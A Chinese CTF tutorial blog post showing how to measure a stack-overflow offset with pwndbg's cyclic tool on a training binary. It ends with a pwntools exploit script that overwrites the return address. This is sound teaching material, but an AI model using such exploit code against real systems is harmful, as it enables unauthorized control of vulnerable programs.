快速计算栈溢出长度

最新推荐文章于 2024-02-02 09:53:20 发布
最新推荐文章于 2024-02-02 09:53:20 发布
阅读量1.2k 收藏 4
点赞数
分类专栏: pwn 文章标签: vim linux python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelxLZ/article/details/121571846
版权
  • Author:ZERO-A-ONE
  • Date:2021-11-27

之前看到网上很多在编写栈溢出的时候计算栈溢出长度的文章,很多工具或者方法放到现在以及没有办法使用了,我经常使用的工具是pwndbg里面调用pwntools的cyclic工具

我们以CTF Wiki里面的示例程序stack-example为例子

首先用IDA找到溢出函数gets的下一个地址为0x804849f,打断点

b *0x804849f

然后使用cyclic工具生成测试字符串

pwndbg> cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab

然后运行将测试字符串输入其中,然后一直按n运行至崩溃处,发现GDB报错

Invalid address 0x61616167

观察EIP的值为

*EIP  0x61616167 ('gaaa')

然后使用工具即可计算出栈溢出的长度

pwndbg> cyclic -l 'gaaa'
24

然后可以编写EXP:

##coding=utf8
from pwn import *
## 构造与程序交互的对象
sh = process('./stack_example')
success_addr = 0x08048456
## 构造payload
payload = b'a' * 24 + p32(success_addr)
print(p32(success_addr))
## 向程序发送字符串
sh.sendline(payload)
## 将代码交互转换为手工交互
sh.interactive()
ZERO-A-ONE
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
springboot运行时内存溢出_栈溢出的检测
weixin_39533896的博客
10-27 1944
说到stack(栈),大家很可能就会想起stack overflow(栈溢出),著名的程序问答网站http://stackoverflow.com 就是以此命名的。因为栈通常是从高地址向低地址增长的,因此"栈溢出"分为两种:超出低地址范围的overrun(上溢)和超出高地址范围的underrun(下溢),"上溢"主要是由过深的函数调用引起(比如递归调用):而"下溢"则会出现在数组/字符串越界的时候...
Jarvislevel2_x64--64位简单栈溢出
qq_43613144的博客
07-26 427
ROPgadget 查找可存储寄存器的代码 ROPgadget --binary level_x64(名字) --only 'pop|ret' | grep 'eax' 查找字符串 ROPgadget --binary rop --string "/bin/sh" 查找有int 0x80的地址 ROPgadget --binary rop --only 'int' ...
栈溢出计算偏移量
weixin_62675330的博客
03-08 3370
栈溢出计算偏移量 一,GDB调试出偏移量 0x8048677 <main+95> lea eax, [esp + 0x1c] 0x804867b <main+99> mov dword ptr [esp], eax ► 0x804867e <main+102> call gets@plt 通过这一串汇编指令可以看出来,此时起始地址相对于esp的偏移为0x1c,只要查看这时候的esp和ebp的寄存器就可以知道偏移量为多少。
python pwntools库 简介 主要功能有 网络 进程 文件 编解码 elf 汇编 调试
whatday的专栏
11-29 3119
Pwntools是一个工具包,使选手们在CTF期间的尽可能容易的编写EXP,并使EXP尽可能的容易阅读。有些代码每个人都写过无数次,而且每个人都有自己的方法。Pwntools的目标是以半标准的方式提供所有这些,这样你就可以停止复制粘贴相同的代码,而是使用更多稍微清晰的包装器,如pack或p32甚至。除了对日常的功能进行方便的包装外,它还提供了一套非常丰富的IO管道,将所有你曾经执行过的IO封装在一个统一的界面中。从本地攻击切换到远程攻击,或者通过SSH进行本地攻击,都只是修改一行代码的工作。
cyclic查看缓冲区溢出长度
小龙在线
09-29 2400
read、gets等C函数对输入没有限制,如果有可以溢出的堆栈,就有缓冲区溢出漏洞。 方法一: 方法二: 使用pwntoolscyclic: 安装 $ apt-get update $ apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential $ pip install --upgrade pip $ pip install --upgrade pwntools 测试 cyclic
CTF-pwn pwntools用法探索
最新发布
dzqxwzoe的博客
02-02 1602
相信各位CTF pwners一定对pwntools熟悉得不能再熟悉,做一道题时写下的第一行代码很可能就是。很多pwners对于pwntools的了解可能仅限于远程交互、ELF文件简单分析这些最基础的功能,但pwntools真的只有这些功能吗?你真的会使用pwntools吗?本文从入手,进行pwntools功能的探索。
linux 函数栈溢出,64位Linux下的栈溢出
weixin_30175731的博客
05-03 496
今天在看《捉虫日记》,其中讲解的Linux下的栈缓冲区溢出是32位机器的,和我的64位机器有些不同之处。下面是我在64位Linux (Ubuntu14) 下的栈缓冲区溢出实验的记录。首先是有溢出漏洞的程序,这个程序来自于《捉虫日记》。#includevoid overflow(char *arg){char buf[12];strcpy(buf, arg);}int main(int argc, ...
顺序栈公用
10-27
在“顺序栈公用问题的解答”中,可能涉及的具体问题包括如何实现顺序栈的基本操作,如何处理栈溢出(当数组已满但还需压入元素)和栈下溢(当数组为空但还需弹出元素)的情况,以及如何优化这些操作的效率。...
JavaScript实现快速排序的方法
10-23
然而,在处理大量数据时,考虑到JavaScript的递归深度限制,可能需要考虑使用尾递归优化或者迭代版本的快速排序来避免栈溢出。 此外,这个示例中的快速排序没有考虑相等元素的处理,对于有大量重复元素的数组,可能...
PHP 快速排序算法详解
10-25
需要注意的是,快速排序在处理大数据集时可能会遇到性能问题,例如内存限制,因为它使用递归,对于非常大的数组可能会导致栈溢出。然而,通过适当的优化,如随机选择基准、三数取中等策略,可以进一步提高其性能并...
2015年计算机真题及解析.doc
12-06
1. **递归与调用栈**:题目中的C++代码展示了递归函数`s`,它计算一个整数的阶和。当调用`s(1)`时,调用栈会按照`main()->S(1)->S(0)`的顺序保存信息,因为每次递归都会将当前的调用信息压入栈顶,直到遇到基本情况`...
2014年考研计算机统考408真题.doc
07-08
1. 时间复杂度分析:第一道题目涉及的是算法的时间复杂度计算。在给定的程序段中,有两个嵌套的循环,外层循环以2为基数翻倍,内层循环是对n的线性遍历。因此,总的时间复杂度是O(n)。正确答案是B。 2. 中缀表达式...
数据结构——堆栈的C++实现
zxr916的博客
11-02 593
数据结构——堆栈的C++实现 \qquad堆栈的创建、判断是否为空,入栈,出栈操作的C++实现。 #include<iostream> using namespace std; //1.定义 typedef struct Node* Link; struct Node { int num; Link next; }; //2.创建堆栈头结点 Link CreateStack() { Link s; s = new Node; s->next = NULL; return s
手动测量变量溢出长度
yw__y的博客
04-22 103
报错的意思是跳转到0x62616164这步出错了,意思是没有这个位置,这个位置就是200个有序字符其中最先溢出的部分。只要知道这个地址时输入的第几个字符,就可以知道前面有多少个字符了。细心的人可能就会发现我输入的不是baad而是daab,这是因为机器的小端序存储,而这里溢出显示的也是小端序的,所以应该颠倒以下顺序,但是如果直接输入地址,就没这么麻烦了。输入start,设置断点在main函数,输入c继续运行,将生成的无序字符粘贴在输入框中,回车。是32位的,开启了nx保护。结果和上面的是一样的,
linux64 溢出,64位Linux下的栈溢出
weixin_36383252的博客
05-12 452
from:http://packetstormsecurity.com/files/download/127007/64bit-overflow.pdf本文的目的是让大家学到64位缓冲区溢出的基础知识。 作者Mr.Un1k0d3rRingZer0Team摘要0x01x86和x86_64的区别0x02漏洞代码片段0x03触发溢出0x04控制RIP0x05跳入用户控制的缓冲区0x06执...
二进制安全:PWNpwntools工具的用法
「鸿渐之翼」的博客
04-17 1471
pwntools是一个CTF框架和开发库。它是用Python编写的,是为快速原型设计和开发而设计的,旨在使利用漏洞的编写尽可能简单。 from pwn import This imports a lot of functionality into the global namespace. You can now assemble, disassemble, pack, unpack, and many other things with a single function. A full list of
pwntools使用简介
热门推荐
jmp esp
05-07 4万+
0x01 pwntools?pwntools是一个ctf框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。pwntools下载:https://pwntools.com/ 文档在线:http://pwntools.readthedocs.io/en/latest/0x02 使用简介官网的一个简单样例from pwn import * contex
【简单栈溢出】使用Ida&&OD分析
Y1seco的博客
05-02 1269
文章目录源码IDA分析使用OD分析 源码 #include <stdio.h> #include <stdlib.h> #include <string.h> #define PASSWORD "1234567" int verify_password(char *password){ int authentication; char buffer[8]; authentication=strcmp(password, PASSWORD); strcpy(buf
栈 栈帧初步了解 PWN配置
s5555555___的博客
12-23 827
3,GS机制:缓冲区安全检查,编译器会为每个函数调用的入口增加额外的随机数(被称为canary),它位于EBP之前,同时在data内存区存放该随机数的副本,当函数发生溢出时,它会被覆盖,函数在返回之前会比较data区中的副本的值和栈帧的真实值,如果两者不同,则触发异常处理流程。1,函数调用层次太深。通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取出放入eip寄存器中,紧接着执行eip所指向的位置的指令,这样就相当于控制了程序的执行流。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值